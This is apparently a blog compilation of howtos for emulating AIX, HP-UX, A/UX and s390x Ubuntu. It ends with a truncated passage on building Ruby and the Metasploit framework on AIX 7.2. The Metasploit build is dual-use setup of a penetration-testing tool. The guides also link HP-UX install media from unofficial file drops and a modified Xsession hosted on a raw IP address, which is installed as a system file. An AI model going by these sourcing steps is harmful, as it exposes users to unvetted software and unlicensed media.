05/05/19 X11.fnt.iso5 5.1.0.0 
05/05/19 X11.fnt.iso7 5.1.0.0 
05/05/19 X11.fnt.iso8 5.1.0.0 
05/05/19 X11.fnt.iso8_T1 5.1.0.0 
05/05/19 X11.fnt.iso9 5.1.0.0 
05/05/19 X11.fnt.iso_T1 5.1.0.0 
05/05/19 X11.fnt.ksc5601.ttf 5.1.0.0 
05/05/19 X11.fnt.ucs.com 5.1.0.0 
05/05/19 X11.fnt.util 5.1.0.0 
05/05/19 X11.motif.lib 5.1.0.50 
05/05/19 X11.motif.mwm 5.1.0.35 
05/05/19 X11.vsm.lib 5.1.0.25 
05/05/19 bos.txt.bib 5.1.0.0 
05/05/19 bos.txt.bib.data 5.1.0.0 
05/05/19 bos.txt.hplj.fnt 5.1.0.0 
05/05/19 bos.txt.ibm3812.fnt 5.1.0.0 
05/05/19 bos.txt.ibm3816.fnt 5.1.0.0 
05/05/19 bos.txt.spell 5.1.0.0 
05/05/19 bos.txt.spell.data 5.1.0.0 
05/05/19 bos.txt.tfs 5.1.0.0 
05/05/19 bos.txt.tfs.data 5.1.0.0 
05/05/19 bos.txt.ts 5.1.0.35 
05/05/19 xlC.aix50.rte 5.0.2.2 
05/05/19 xlC.cpp 5.0.2.0 
05/05/19 xlC.rte 5.0.2.1

Once we have these in place we create a backup of a few files:

# mv /usr/lib/X11/xdm/Xsession  /usr/lib/X11/xdm/Xsession.mwm
# cp /usr/dt/bin/Xsession /usr/dt/bin/Xsession.cde


Now the CDE (dt) Xsession has some strange keyboard configurations that will effectively mess up the CDE session if you want to use the keyboard (which we do), so I have modified it a little and uploaded it to my site, where you can get it here:

http://45.76.81.249/AIX/aix-5.1/Xsession.cde

# cp Xsession.cde /usr/lib/X11/Xsession 
# /usr/bin/X11/xdm

And on the Linux machine that runs qemu-system-ppc 

$ Xephyr -screen 980x640 -ac -query 10.0.2.12 :3

We get a nice CDE desktop finally

Be patient, full CDE takes about 1 minute to load

Running HP-UX 11.11 on qemu-system-hppa


The last of the major commercial UNIX systems that I wanted to see emulated is the legendary HP-UX (Hewlett Packard Unix; more information on Wikipedia: https://en.wikipedia.org/wiki/HP-UX ). And since last week we had the Gregorian calendar Easter and today we have the Julian calendar Easter, it is a symbolic Resurrection of HP-UX.

The emulated machine is an HP B160L desktop machine.

It was quite a surprise when I noticed Sven Schnelle (https://github.com/svenschnelle) mention that HP-UX now runs under qemu-system-hppa, so of course I wanted to test and try it.

https://parisc.wiki.kernel.org/index.php/Qemu

I am running all my emulation experiments solely on Linux x86_64 (Linux Mint 19.1) and all the networking support is strictly Linux only so if you wish to reproduce this on macOS or Windows you are on your own there.

I have git-cloned recent qemu from https://github.com/qemu/qemu and built only the hppa emulation (you can build the whole thing of course):

$ mkdir -p $HOME/KVM/HPUX
$ cd $HOME/KVM/HPUX
$ git clone https://github.com/qemu/qemu.git
$ cd qemu 
$ ./configure --target-list=hppa-softmmu
$ make 

Copy the compiled qemu-system-hppa binary to your working directory

$ cd $HOME/KVM/HPUX
$ ./qemu-system-hppa --version
QEMU emulator version 3.1.93 (v4.0.0-rc3-4-g13c24edaa7-dirty)
Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

So now we are almost ready for the installation, but before that we need to make sure a couple of prerequisites are met. The main thing is of course the installation media (HP-UX B.11.11), which was found in the deep corners of the internet:

CD1 https://drop.me/MY0mqq
CD2 https://drop.me/MzP4Ry
CD3 https://drop.me/opL13Z
CD4 https://drop.me/M0yxgZ

For convenience's sake I have named the HP-UX 11.11 ISOs as follows (place them in the working directory that holds the qemu-system-hppa binary as well as the disk images, etc.):

-rw-rw-r-- 1 user user 642865152 Apr 28 00:43 hpux11-01.iso
-rw-rw-r-- 1 user user 357793792 Apr 28 00:51 hpux11-02.iso
-rw-rw-r-- 1 user user 648380416 Apr 28 00:57 hpux11-03.iso
-rw-rw-r-- 1 user user 309100544 Apr 28 00:55 hpux11-04.iso

Next we need to make sure the qemu networking is set up (tun/tap and bridge). Below is my network sharing script, which one needs to execute as root prior to starting the emulation:

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Note: it seems that networking support is not implemented yet in qemu-system-hppa; the following is on the to-do list (https://parisc.wiki.kernel.org/index.php/Qemu ):

  • Emulate Lasi (i82596) and Tulip (DEC 21×40) network cards in Qemu

Next make sure you have the following /etc/qemu-ifup script in place:

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# always use the br0 bridge created by the tap/bridge setup script
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next we need to define a disk image (HP-UX 11.11 will need a full raw disk image, default qemu-img create -f qcow2 hpux.img 8G will NOT WORK !)

$ cd $HOME/KVM/HPUX
$ dd if=/dev/zero of=hpux.img bs=1024 count=8M

Next we define the HP-UX installation loader script to make things easier

$ cd $HOME/KVM/HPUX
./qemu-system-hppa -boot d -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

OK, so we are almost ready, but just one last thing before we fire up the installation (we all love green, don't we?): get yourself the super cool retro-terminal from here https://github.com/Swordfish90/cool-retro-term I'm using it in my examples below, in case you wonder where the screenshots come from (remember the good old terminal days when things seemed simple?)

So let's start the HP-UX 11.11 emulation now:

root@panasonic:/home/user/KVM/HPUX/HP-UX-11.11# ./install.sh 
qemu-system-hppa: -serial telnet::4441,server: info: QEMU waiting for connection on: disconnected:telnet:0.0.0.0:4441,server
QEMU 3.1.93 monitor - type 'help' for more information
(qemu)

You need to connect to the qemu telnet server via a good terminal emulator (retro-terminal is quite good)

$ telnet localhost 4441

After a short time you will get kicked into the installation menu if all went right.

Select the additional software you want installed (mind that we only created an 8 GB disk).

Now we need patience, since it can take some time (1 to 2 hours depending on what we chose to install) to finish.

Eventually it will finish

We will need to provide a CD2 installation image now

(qemu) change scsi0-cd2 ./hpux11-02.iso

The installer will continue now

Sweet CDE installing now

Once the CD2 finishes we get instructed to insert CD3

(qemu) change scsi0-cd2 ./hpux11-03.iso

And the installer will continue

Yet again we get prompted for the last CD4

(qemu) change scsi0-cd2 ./hpux11-04.iso

And the installer will continue again

And finally it will FINISH !

We will need to change the loader script for qemu-system-hppa to tell it to boot the new disk instead of the CD

./qemu-system-hppa -boot c -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

Now again this will take some time to get through first boot; populating /dev/; setting up post-installation scripts etc .. so be patient

Note that the setup process will take long to build the CIM Repository (this is something observed by others on real HP-UX hardware: https://community.hpe.com/t5/Server-Management-Systems/Why-does-it-take-so-long-to-build-the-CIM-repository-on-HPUX/td-p/4931711 ). You can just press CTRL+C if you don't want to wait, as I did.

It will shortly go through the shutdown procedure (with a nasty FAILURE message since we broke the CIM Repository setup), but it does not matter, just load the simulation again:

./qemu-system-hppa -boot c -serial telnet::4441,server -drive if=scsi,bus=0,index=6,file=./hpux.img,format=raw -serial mon:stdio -D /tmp/foo -nographic -m 512 -d nochain -cdrom ./hpux11-01.iso -D /tmp/foo -net nic -net tap

This time it will start booting properly

And we will be greeted with System options menu to configure (GeoCustoms)

Finally we land up in network configuration menu

Press [y]

Choose [n] since we will setup networking manually

Choose [y]

Choose hostname: UNIX (feel free to experiment here, but there are some pretty wild rules for the 8-character maximum hostname)

Setup your time zones, root password..

Next we setup our IP – I have used 10.0.2.12 and define subnet and gateway IP  (IT WILL FAIL TO VERIFY)

Setup other networking parts

NETWORK WILL FAIL TO VERIFY

And finally it will continue booting ….

I guess some work after login is needed to address these (networking):

Configure LAN interfaces …………………………………….. FAIL *
Starting HP-UX Secure Shell ………………………………….. FAIL *

Finally we land up in a root shell

# uname -a
HP-UX UNIX B.11.11 U 9000/778 2006243326 unlimited-user license
# 

And it looks like networking is not yet supported under qemu-system-hppa
https://parisc.wiki.kernel.org/index.php/Qemu

# ifconfig lan0
ifconfig: no such interface
# netstat -in
Name           Mtu Network            Address                 Ipkts      Opkts
lo0           4136 127.0.0.0          127.0.0.1                 166        166
# 

I will keep investigating this, since networking is an essential part of the whole simulation of HP-UX

Here are some notes I have gathered after the installation

To get rid of the annoying stuck message during the boot process

NFS server (pid672@/net) not responding still trying

# /sbin/init.d/nfs.client stop
killing rpc.lockd
killing rpc.statd
killing biod
killing automount
# /sbin/init.d/nfs.server stop
# /sbin/init.d/nfs.core stop
stopping rpcbind

# cd /etc/rc.config.d
# ls -la nfs*
-r-xr--r-- 1 bin bin 2958 Apr 28 20:07 nfsconf
# 

Edit /etc/rc.config.d/nfsconf and change as follows:

NFS_CLIENT=0
NFS_SERVER=0

Reboot

Here is a video demo of the HP-UX running under qemu


A/UX Apple UNIX for 68k Macintosh


Apple A/UX was an early port of Unix to Apple's 68k-based Macintosh platform. It featured a full Unix system with a MacOS GUI and the ability to run classic MacOS applications. I had never heard of it until I stumbled on it by accident on https://winworldpc.com/product/a-ux/3x

Since I have not seen any Linux-specific instructions on how to get this up and running (apart from Neozeed's excellent articles here https://virtuallyfun.com/wordpress/category/aux/ ), this is a short howto to get one going.

We will be running the so-called ShoeBill: an all-new, BSD-licensed Macintosh II emulator designed from the ground up with the singular goal of running A/UX.

Prerequisites

Let's prepare the environment for the build first (download either A/UX 3.0.0 or 3.0.1):

$ mkdir -p $HOME/AUX 
$ cd $HOME/AUX 
$ sudo su 
# apt-get install build-essential libsdl2-dev  uuid-dev p7zip-full wget git 
# exit 
$ 7z e 'Apple AUX 3.0.1.7z'
$ rm -rf 'Apple AUX 3.0.1' 'Apple AUX 3.0.1.7z'  'www.betaarchive.co.uk.info'
$ mv AUX_3.0.1_Install.iso aux.img 
$ wget https://github.com/nyteshade/mini-vmac-setup/raw/master/MacII.ROM

So let's pull the ShoeBill sources now and build it:

$ cd $HOME/AUX
$ git clone https://github.com/pruten/shoebill.git
$ cd shoebill/sdl-gui
$ ./lin_build.sh

gcc -O3 -ggdb -flto adb.post.c fpu.post.c mc68851.post.c mem.post.c via.post.c floppy.post.c core_api.post.c cpu.post.c dis.post.c ../core/SoftFloat/softfloat.c ../core/atrap_tab.c ../core/coff.c ../core/exception.c ../core/macii_symbols.c ../core/redblack.c ../core/scsi.c ../core/video.c ../core/filesystem.c ../core/alloc_pool.c ../core/toby_frame_buffer.c ../core/ethernet.c ../core/sound.c sdl.c -lpthread -lm -lSDL2 -lGL -o shoebill
fpu.post.c: In function ‘_native_tentox’:
fpu.post.c:821:9: warning: type of ‘a’ defaults to ‘int’ [-Wimplicit-int]
 double  _native_tentox(a) {
         ^~~~~~~~~~~~~~
/tmp/cctaC1Cr.ltrans1.ltrans.o: In function `printf':
/usr/include/x86_64-linux-gnu/bits/stdio2.h:104: warning: `sys_errlist' is deprecated; use `strerror' or `strerror_r' instead

$ cp shoebill $HOME/AUX
$ cd $HOME/AUX

Now we are ready to run ShoeBill on Linux (networking TUN/TAP support does not currently work); the ROM file name is the one the wget above saved:

$ cd $HOME/AUX
$ ./shoebill rom=./MacII.ROM disk0=aux.img width=1024 height=768 ram=64

And ShoeBill should boot (to release the mouse cursor simply press the right mouse button)

Since networking is not working, we can transfer files to and from the system the following way (copy aux.img to aux2.img):

$ cd $HOME/AUX
$ cp aux.img aux2.img 
$ sudo su 
#  apt-get install hfsutils

# mkdir -p /mnt/disk
# losetup --find --show ./aux2.img
/dev/loop1
# partprobe /dev/loop1
# mount -t hfs -o rw /dev/loop1p3 /mnt/disk

This way we can delete some files on /mnt/disk (freeing up about 10 MB), copy some files over, unmount the drive, attach it to the emulator and re-execute ShoeBill:

# umount /mnt/disk 
# exit 
$ cd $HOME/AUX
$
$ ./shoebill rom=./MacII.ROM disk0=aux.img disk1=aux2.img width=1024 height=768 ram=64

This is a dirty hack and I'm not sure it's really worth it :)

Testing bleeding edge Ubuntu Server 19.10 s390x in qemu


Qemu seems to be doing a much better job at getting the latest virtio-supported Linux builds for Big Iron (Linux One, for IBM System z series mainframes) than the Hercules/Hyperion simulator (although the latter can still run non-Linux stuff), so this is an updated howto, one year after my previous s390x article https://astr0baby.wordpress.com/2018/06/03/installing-ubuntu-18-04-server-s390x-in-hercules-mainframe-simulator/

There are a few Linux distributions that have major support from IBM on the z series, and those are RHEL, SLES and Ubuntu. The RHEL-8 beta s390x kernel panics during the initial installation boot. SLES and Ubuntu work really well, so you can try both, but I have chosen the more open Ubuntu instead.

A short entry on how to get this up and running. We are again using the bleeding-edge qemu from git and a trusty x86_64 Linux distribution (I use Mint 19.1). Make sure your system can support a minimum of 4 GB RAM for the qemu guest and has sufficient CPU power (I have an Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz).

$ mkdir -p $HOME/KVM/s390x/Ubuntu
$ cd $HOME/KVM/s390x/Ubuntu
$ git clone https://github.com/qemu/qemu.git
$ cd qemu 
$ ./configure --target-list=s390x-softmmu
$ make 

Copy the compiled qemu-system-s390x binary to your working directory

$ cd $HOME/KVM/s390x/Ubuntu
$ ./qemu-system-s390x --version
QEMU emulator version 3.1.93 (v4.0.0-rc3-4-g13c24edaa7-dirty)
Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

Latest Ubuntu server builds are available here http://cdimage.ubuntu.com/ubuntu-server/daily/current/ so we will just wget the ISO

$ cd $HOME/KVM/s390x/Ubuntu 
$ mkdir iso 
$ wget http://cdimage.ubuntu.com/ubuntu-server/daily/current/eoan-server-s390x.iso
$ sudo su 
# mount -o loop eoan-server-s390x.iso ./iso 
# cd ./iso
# cat ubuntu.ins 
* Ubuntu for z Series (default kernel)
boot/kernel.ubuntu 0x00000000
boot/initrd.off 0x0001040c
boot/initrd.siz 0x00010414
boot/parmfile.ubuntu 0x00010480
boot/initrd.ubuntu 0x01000000

// Here we copy the kernel and initrd from the mounted ISO

# cp boot/kernel.ubuntu ../
# cp boot/initrd.ubuntu ../ 
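
The ubuntu.ins file above is the s390x IPL list: every non-comment line is "path load-address", and the loader copies each file to its address in guest memory. As an added example (not Ubuntu's or qemu's tooling), here is a small sanity check for such a file before handing its kernel and initrd to qemu: it extracts the entries, picks the kernel and initrd paths, verifies that every referenced file exists under the ISO root, and flags any file that, placed at its address, would run into the next entry. The ROOT argument and the function names are my own; the .ins content used in the test is constructed to match the listing above.

```shell
#!/bin/sh
# Checks for an s390x ".ins" IPL list such as ubuntu.ins, added as an example
# (not part of Ubuntu's or qemu's tooling). Each non-comment line is
# "path load-address"; the loader copies every file to its address, so a file
# longer than the gap to the next address would clobber its neighbour.
# Assumed layout: paths are relative to the ISO root passed as ROOT.

# ins_entries INS: "path address" for each load entry ("* ..." lines are comments)
ins_entries() {
    awk '$1 != "*" && NF == 2 { print $1, $2 }' "$1"
}

# ins_kernel INS / ins_initrd INS: paths to hand to qemu -kernel / -initrd
# (initrd.off and initrd.siz are 4-byte address/size markers, not the image)
ins_kernel() { ins_entries "$1" | awk '$1 ~ /kernel/ { print $1; exit }'; }
ins_initrd() { ins_entries "$1" | awk '$1 ~ /initrd\./ && $1 !~ /\.(off|siz)$/ { print $1; exit }'; }

# ins_check ROOT INS: every referenced file must exist below ROOT and, placed
# at its load address, must end before the next entry starts. Prints one line
# per entry (ok/missing/overlap) and returns 1 if anything is wrong.
ins_check() {
    root="$1"; ins="$2"; rc=0; prev_end=0; prev_path=""
    tmp=$(mktemp)
    # "start size path", numerically sorted by start address; size -1 = missing
    ins_entries "$ins" | while read -r path addr; do
        f="$root/$path"
        if [ -f "$f" ]; then
            size=$(wc -c < "$f" | tr -d ' ')
        else
            size=-1
        fi
        printf '%d %d %s\n' "$((addr))" "$size" "$path"
    done | sort -n > "$tmp"
    while read -r start size path; do
        if [ "$size" -lt 0 ]; then
            echo "missing $path"; rc=1; continue
        fi
        if [ "$start" -lt "$prev_end" ]; then
            echo "overlap $prev_path $path"; rc=1
        fi
        end=$((start + size))
        echo "ok $path $start $end"
        prev_end=$end; prev_path=$path
    done < "$tmp"
    rm -f "$tmp"
    return $rc
}
```

With the ISO mounted as above, `ins_check ./iso ./iso/ubuntu.ins` followed by `ins_kernel` and `ins_initrd` gives the two paths that the -kernel and -initrd options of the install.sh script further down expect.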

Next we prepare the virtual disk to which we will be installing the OS (6 GB is the minimum):

$ cd $HOME/KVM/s390x/Ubuntu
$ dd if=/dev/zero of=ubuntu.img bs=1024 count=6M

Next we make sure we have the "patched" /etc/qemu-ifup script in place:

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# always use the br0 bridge created by the tap/bridge setup script
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next we need to make sure the qemu networking is set up (tun/tap and bridge). Below is my network sharing script, which one needs to execute as root prior to starting the emulation:

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
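
The same tap/bridge script is used in the AIX 5.1 and HP-UX 11.11 entries above. As an added example (not the blog's script), here is an equivalent written with iproute2 that is safe to re-run and that limits NAT and forwarding to the guest bridge: the original switches net.ipv4.ip_forward on globally and masquerades everything leaving wlan0, so the laptop quietly becomes a router for any other interface as well. The interface names and addresses are the ones used on this page (tap0, br0, wlan0, the user "user", 10.0.2.2/24); DRY_RUN is a switch I added so the commands can be reviewed before a root run.

```shell
#!/bin/sh
# Idempotent tap/bridge setup for the qemu guests on this page, added as an
# example (not the blog's own script). Uses iproute2 instead of tunctl/brctl
# and restricts forwarding and NAT to the guest bridge. Assumed values (taken
# from the scripts on this page): TAP=tap0, BR=br0, UPLINK=wlan0, OWNER=user,
# BR_ADDR=10.0.2.2/24, GUEST_NET=10.0.2.0/24. DRY_RUN=1 prints instead of acting.

TAP="${TAP:-tap0}"
BR="${BR:-br0}"
UPLINK="${UPLINK:-wlan0}"
OWNER="${OWNER:-user}"
BR_ADDR="${BR_ADDR:-10.0.2.2/24}"
GUEST_NET="${GUEST_NET:-10.0.2.0/24}"
DRY_RUN="${DRY_RUN:-0}"

# run CMD...: execute the command, or print it when DRY_RUN=1
run() {
    if [ "$DRY_RUN" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# rule TABLE CHAIN RULE...: append an iptables rule only if it is not there yet
rule() {
    table="$1"; shift
    if [ "$DRY_RUN" = 1 ]; then
        printf 'iptables -t %s -A %s\n' "$table" "$*"
    else
        iptables -t "$table" -C "$@" 2>/dev/null || iptables -t "$table" -A "$@"
    fi
}

# tapbr_up: tap + bridge + restricted NAT; safe to run repeatedly
tapbr_up() {
    # tap device owned by the unprivileged user that will run qemu
    if [ "$DRY_RUN" = 1 ] || [ ! -d "/sys/class/net/$TAP" ]; then
        run ip tuntap add dev "$TAP" mode tap user "$OWNER"
    fi
    # the bridge is the guest LAN; the host side carries the gateway address
    if [ "$DRY_RUN" = 1 ] || [ ! -d "/sys/class/net/$BR/bridge" ]; then
        run ip link add name "$BR" type bridge
        run ip addr add "$BR_ADDR" dev "$BR"
    fi
    run ip link set "$TAP" master "$BR"
    run ip link set "$BR" up
    run ip link set "$TAP" up
    run sysctl -q -w net.ipv4.ip_forward=1
    # NAT only traffic that originates in the guest network
    rule nat POSTROUTING -s "$GUEST_NET" -o "$UPLINK" -j MASQUERADE
    # guests may go out through the uplink, only replies may come back in,
    # and anything else crossing the bridge is dropped
    rule filter FORWARD -i "$BR" -o "$UPLINK" -j ACCEPT
    rule filter FORWARD -i "$UPLINK" -o "$BR" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
    rule filter FORWARD -i "$BR" -j DROP
    rule filter FORWARD -o "$BR" -j DROP
}

# tapbr_down: remove the tap and the bridge (the iptables rules stay; tapbr_up
# re-adds them idempotently anyway)
tapbr_down() {
    run ip tuntap del dev "$TAP" mode tap
    run ip link delete "$BR"
}

case "${1:-}" in
    up)   tapbr_up ;;
    down) tapbr_down ;;
esac
```

Saved as, say, tapbr.sh (an assumed name), `sh tapbr.sh up` as root replaces the script above and `sh tapbr.sh down` cleans up after the emulation; `DRY_RUN=1 sh tapbr.sh up` just lists what would be executed.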

We are going to use a virtual LAN 10.0.2.2/24  and assign our guest IP as 10.0.2.20 and gateway 10.0.2.2

And finally our install.sh script, which loads the installer and needs to be executed as root:

#!/bin/bash 
./qemu-system-s390x -machine s390-ccw-virtio -cpu max,zpci=on -serial telnet::4441,server -display none -m 4096 \
-net nic -net tap \
--cdrom eoan-server-s390x.iso \
-kernel kernel.ubuntu -initrd initrd.ubuntu \
-drive file=ubuntu.img,if=none,id=drive-virtio-disk0,format=raw,cache=none \
-device virtio-blk-ccw,devno=fe.0.0001,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1,scsi=off

We connect to the console via telnet (or any other capable terminal emulator). For the screens below I'm using the cool-retro-term IBM 3278 profile to make it look more like a mainframe console.

$ telnet localhost 4441

And if all went well the Ubuntu s390x will start to boot (The whole setup and installation can take about +- 2 hours)

Since the auto-configuration via DHCP will obviously fail, we will configure the network manually

Add 10.0.2.20 as IP

255.255.255.0 as netmask, and 10.0.2.2 as gateway IP

Nameserver (DNS) you can set 8.8.8.8 and setup a local hostname

Next we are asked for the remote SSH password for the installer session to which we will externally connect (so setup something)

And finally you get presented with login instructions for the remote installer (which we won't really need, since the installation will keep going in the telnet console session)

Next we choose a language and location and the country mirror for the install-sets

The session will continue

After a few minutes (about 5) we get prompted to setup the users and passwords, confirm timezone ..

Next we will get to the disk setup stage, I just use entire disk

vda of course

And finally save all changes to that disk

Finally it will start the last stage of the install (the longest one), so it's time for tea or coffee since this will be the longest task of all (around 50 to 60 minutes)

Oh nice, we get a shiny new Linux Kernel 5.0.0 with the s390x current :)

Finally you might want to disable automatic updates (since this is lab stuff)

And just as I thought that we are done; another set of packages started to configure …

We get asked once more what other subset of packages we want, I chose none and will keep the core since we can always install the other stuff later

And yet more packages gets pulled from the net ..

And hopefully this is the last installation message

And now we need to wait a while for the whole thing to come down … be patient

To get to the end finally … (?)

Which will then kick to reboot

Congratulations, now you are running a mainframe Ubuntu 19.10 server on your laptop !

So we log in and shut down. Finally we prepare the following loader script for the installed system. Do not worry, the system is quite snappy now and the boot time on my machine is 74 seconds!

#!/bin/bash
./qemu-system-s390x -machine s390-ccw-virtio -cpu max,zpci=on -serial telnet::4441,server -display none -m 4096 \
-net nic -net tap \
--cdrom eoan-server-s390x.iso \
-drive file=ubuntu.img,if=none,id=drive-virtio-disk0,format=raw,cache=none \
-device virtio-blk-ccw,devno=fe.0.0001,drive=drive-virtio-disk0,id=virtio-disk0,bootindex=1,scsi=off

Metasploit framework on AIX 7.2


A short entry here which might be of help to whoever tries to run the Metasploit framework on AIX and the Power architecture. (I have not yet seen anybody mention this on the Internet)

I have done all this under qemu-system-ppc64 (how to run this under Qemu is described in more detail here https://astr0baby.wordpress.com/2018/11/04/running-aix-7-2-tl3sp1-on-x86_64-via-qemu-system-ppc64/) on my laptop, which is perfect for tinkering and testing things before doing them on real hardware. Make sure you use at least 4 GB of RAM for the qemu simulation, otherwise you will not be able to run metasploit (it will try forever to load ..). Here is my qemu loader script

p.s. There are some quirks with newer qemu-system-ppc64 builds and AIX 7.2. The version I'm using, which works well, is the one shown below, and thus I have named it qemu-system-ppc64-old

QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)

./qemu-system-ppc64-old -cpu POWER8 -machine pseries -m 4096 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env boot-command='boot disk: ' -net nic -net tap -display vnc=:1

First of all one needs to download some dependencies. I will include all the RPMs I have already installed on my system via yum from the Aixtoolbox public repo.

AIX-rpm
SDL
SDL-devel
SDL_mixer
SDL_ttf
SDL_ttf-devel
audiofile
audiofile-devel
autoconf
automake
bash
bzip2
bzip2-devel
ca-certificates
cmake
coreutils
cups
cups-libs
curl
cyrus-sasl
db
dbus
esound
esound-devel
expat
expat-devel
expect
flac
fontconfig
fontconfig-devel
freetype2
freetype2-devel
gcc
gcc-c++
gcc-cpp
gcc-go
gdbm
gdbm-devel
gettext
gettext-devel
glib
glib-devel
glib2
glib2-devel
gmp
gmp-devel
gnutls
grep
gtk+
info
less
libXft
libXft-devel
libXrandr
libXrender
libXrender-devel
libffi
libffi-devel
libgcc
libgcrypt
libgcrypt-devel
libgo
libgo-devel
libgpg-error
libgpg-error-devel
libiconv
libjpeg
libmikmod
libmpc
libogg
libogg-devel
libpcap
libpcap-devel
libpng
libpng-devel
libssh2
libssh2-devel
libstdc++
libstdc++-devel
libtasn1
libtool
libvorbis
libvorbis-devel
libxml2
libxml2-devel
libxml2-python
libxslt
libxslt-devel
lua
m4
mpfr
ncurses
ncurses-devel
nettle
nmap
openldap
p11-kit
patch
pcre
pcre-devel
perl
pkg-config
postgresql
postgresql-devel
postgresql-libs
pth
pysqlite
python
python-cryptography
python-devel
python-iniparse
python-passlib
python-pyasn1
python-pycurl
python-six
python-tools
python-urlgrabber
python3
readline
readline-devel
renderproto
rsync
sed
smpeg
smpeg-libs
sqlite
sqlite-devel
tar
tcl
tcsh
tightvnc-server
tk
unzip
wget
xz
xz-devel
xz-libs
yum
yum-metadata-parser
zlib
zlib-devel

Since the ruby-2.5.1 and ruby-devel-2.5.1 RPMs that come from https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/ruby/ do not work for compiling any of the gems that Metasploit depends upon, I have chosen to build Ruby from source on AIX. It is not hard and is a pretty straightforward task (we will install into the /usr/local prefix to keep /opt/freeware separate)

In this example I have used Ruby 2.5.1 version to shadow the Aixtoolbox one, but you can do the same with 2.5.5 or 2.6.3


$ wget https://cache.ruby-lang.org/pub/ruby/2.5/ruby-2.5.1.tar.gz
$ tar -zxvf ruby-2.5.1.tar.gz
$ cd ruby-2.5.1
$ ./configure
$ make
$ su - 
# make install

Once we have Ruby installed (make sure to include /usr/local in your profile's PATH) we can move on to downloading a Metasploit snapshot from git. I chose to get the ZIP snapshot, simply because it's faster under the ppc64 simulator

$ wget  https://github.com/rapid7/metasploit-framework/archive/master.zip
$ unzip master.zip 
$ cd metasploit-framework-master

The next step would be to run bundle install in the metasploit directory, but we will skip this for now, because there are 2 gems we need to customize locally and patch in order to compile and build them on AIX 7.2. These are

nokogiri-1.10.3.gem
bcrypt-3.1.13

Although nokogiri is the most important and most downloaded Ruby gem of all time, it does not build properly on AIX because of the missing vasprintf() function, which is not POSIX and is not present in the AIX C library. The gem compiles if you do not modify the build procedure, but the resulting library does not work and bails with the following error

bash-5.0# /usr/local/bin/gem install nokogiri-1.10.3.gem
Building native extensions. This could take a while...
Successfully installed nokogiri-1.10.3
Parsing documentation for nokogiri-1.10.3
Done installing documentation for nokogiri after 49 seconds
1 gem installed
bash-5.0# /usr/local/bin/nokogiri
Traceback (most recent call last):
        8: from /usr/local/bin/nokogiri:23:in `<main>'
        7: from /usr/local/bin/nokogiri:23:in `load'
        6: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/bin/nokogiri:6:in `<top (required)>'
        5: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
        4: from /usr/local/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
        3: from /usr/local/lib/ruby/gems/2.5.0/gems/nokogiri-1.10.3/lib/nokogiri.rb:28:in `<top (required)>'
